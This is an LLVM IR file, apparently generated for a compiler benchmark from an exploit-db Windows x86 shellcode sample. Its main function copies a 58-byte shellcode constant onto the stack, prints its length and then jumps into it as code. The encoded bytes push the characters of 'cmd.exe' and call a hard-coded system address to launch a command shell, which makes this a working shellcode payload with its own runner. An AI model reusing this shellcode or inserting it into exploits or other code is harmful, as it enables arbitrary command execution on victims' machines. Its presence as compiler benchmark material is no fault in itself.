; ModuleID = '/home/carl/AnghaBench/exploitdb/shellcodes/windows_x86/extr_43764.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/shellcodes/windows_x86/extr_43764.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.shell = private unnamed_addr constant [58 x i8] c"\B8\FF\EF\FF\FF\F7\D0+\E0U\8B\EC3\FFW\83\EC\04\C6E\F8c\C6E\F9m\C6E\FAd\C6E\FB.\C6E\FCe\C6E\FDx\C6E\FEe\8DE\F8P\BB\C7\93\BFw\FF\D3\00", align 16
@.str = private unnamed_addr constant [21 x i8] c"Shellcode lenght %d\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca [58 x i8], align 16
  store i32 0, i32* %1, align 4
  %3 = bitcast [58 x i8]* %2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %3, i8* align 16 getelementptr inbounds ([58 x i8], [58 x i8]* @__const.main.shell, i32 0, i32 0), i64 58, i1 false)
  %4 = getelementptr inbounds [58 x i8], [58 x i8]* %2, i64 0, i64 0
  %5 = call i32 @strlen(i8* %4)
  %6 = call i32 @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str, i64 0, i64 0), i32 %5)
  %7 = call i32 (...) @getchar()
  %8 = getelementptr inbounds [58 x i8], [58 x i8]* %2, i64 0, i64 0
  %9 = bitcast i8* %8 to void (...)*
  call void (...) %9()
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i32 @printf(i8*, i32) #2

declare dso_local i32 @strlen(i8*) #2

declare dso_local i32 @getchar(...) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
